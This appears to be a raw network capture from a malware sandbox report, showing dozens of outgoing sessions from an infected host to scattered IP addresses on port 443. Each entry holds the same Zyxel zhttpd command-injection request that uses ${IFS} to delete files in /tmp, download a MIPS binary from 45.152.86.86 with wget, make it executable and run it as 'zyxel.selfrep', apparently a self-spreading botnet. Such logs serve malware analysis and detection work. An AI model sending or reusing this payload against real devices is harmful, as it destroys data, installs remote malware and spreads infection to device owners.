                                        Mar 31, 2024 09:22:19.595510006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7758192.168.2.2341972222.229.234.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595562935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7759192.168.2.2345086104.143.172.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595619917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7760192.168.2.235919657.234.100.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595690012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7761192.168.2.235790887.157.43.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595760107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7762192.168.2.234309824.201.242.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595819950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7763192.168.2.2347748105.192.143.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595873117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7764192.168.2.2357264205.3.84.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595951080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7765192.168.2.2356512154.65.249.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596026897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7766192.168.2.2345868173.231.155.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596086979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7767192.168.2.2339758108.11.0.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596165895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7768192.168.2.2355214182.229.71.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596235991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7769192.168.2.2353846222.73.81.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596321106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7770192.168.2.235830661.175.133.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596395016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7771192.168.2.234177260.195.42.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596434116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7772192.168.2.235309836.194.143.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596517086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7773192.168.2.2349076147.122.89.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596571922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7774192.168.2.234761861.112.54.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596643925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7775192.168.2.2333102110.60.77.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596715927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7776192.168.2.2346750150.35.42.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596793890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7777192.168.2.2344462173.32.181.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596880913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7778192.168.2.235594620.176.180.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.596946955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7779192.168.2.2353048146.232.222.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597033024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7780192.168.2.2338104206.77.26.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597107887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7781192.168.2.2342688141.6.135.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597172022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7782192.168.2.2335284212.1.151.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597234964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7783192.168.2.234053272.55.246.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597311020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7784192.168.2.233894020.211.235.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597383976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7785192.168.2.234561048.244.254.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597429991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7786192.168.2.2352932115.120.55.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597498894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7787192.168.2.235690671.44.66.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597570896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7788192.168.2.234744625.157.172.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597641945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7789192.168.2.23463962.240.95.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597706079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7790192.168.2.2334514114.30.36.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597786903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7791192.168.2.23343905.137.50.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597851038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7792192.168.2.2359982123.214.160.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597932100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7793192.168.2.2360990202.183.30.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.597987890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7794192.168.2.2338570151.66.54.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598071098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7795192.168.2.2359170138.9.227.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598160028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7796192.168.2.2345576137.45.72.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598262072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7797192.168.2.234148425.120.245.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598305941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7798192.168.2.2340378196.254.255.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598386049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7799192.168.2.2333512163.160.65.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598429918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7800192.168.2.2353036121.224.166.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598490953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7801192.168.2.235225074.80.224.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598593950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7802192.168.2.2346986205.99.111.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598645926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7803192.168.2.2343426145.49.178.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598735094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7804192.168.2.235200063.23.65.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598783016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7805192.168.2.234343685.254.20.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598885059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7806192.168.2.233436879.51.195.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.598956108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7807192.168.2.2343306189.96.255.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599009037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7808192.168.2.2354332122.238.116.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599092960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7809192.168.2.2336890222.34.187.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599162102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7810192.168.2.2346866130.64.78.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599216938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7811192.168.2.2347106109.33.23.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599266052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7812192.168.2.2333614174.88.231.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599323034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7813192.168.2.236080065.225.46.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599397898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7814192.168.2.2342786207.222.135.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599461079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7815192.168.2.2355526201.70.7.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599531889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7816192.168.2.2349944112.188.21.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599598885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7817192.168.2.2354268107.245.195.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599647999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7818192.168.2.233877490.64.72.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599730968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7819192.168.2.2347332106.166.21.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599783897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7820192.168.2.2338618169.66.22.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599842072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7821192.168.2.236083242.11.217.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599956036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7822192.168.2.235302077.119.181.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.599987984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7823192.168.2.2345702196.164.153.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.600066900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7824192.168.2.2355624114.90.97.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.600123882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7825192.168.2.2346838195.237.214.79443
                                        TimestampBytes transferredDirectionData
